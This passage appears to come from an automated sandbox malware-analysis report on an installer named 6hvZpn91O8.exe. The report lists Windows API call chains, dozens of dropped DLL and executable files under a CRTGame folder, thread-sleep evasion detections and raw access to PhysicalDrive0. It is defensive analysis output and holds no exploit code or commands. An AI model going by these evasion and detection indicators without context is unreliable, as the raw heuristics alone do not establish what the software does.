                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B54
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,6_2_02C2F3A0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 9637Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OMMAA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4NPOS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RHF7D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OJ8GN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-73F5N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AGPIJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2CG7G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-4264D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OF8TE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2CGLR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-F44SJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C6CS8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ML5PH.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-G7PIK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-849ND.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-7Q436.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2JPEP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-12J2O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-766CT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-640V1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C1CHO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DQCHN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6RB4E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QECHS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KANF7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SGP9P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NG6SA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-K8VM1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V4GP3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HS78I.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UMM6D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KPUSQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RNIE1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HAM7K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BJBAO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V8IE4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-S02KC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RPUOD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-65BJ1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-Q2C64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PIVQ2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NH7NT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-58TJN.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5688
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308Thread sleep count: 267 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308Thread sleep time: -534000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 1432Thread sleep count: 41 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 1432Thread sleep time: -2460000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308Thread sleep count: 9637 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308Thread sleep time: -19274000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
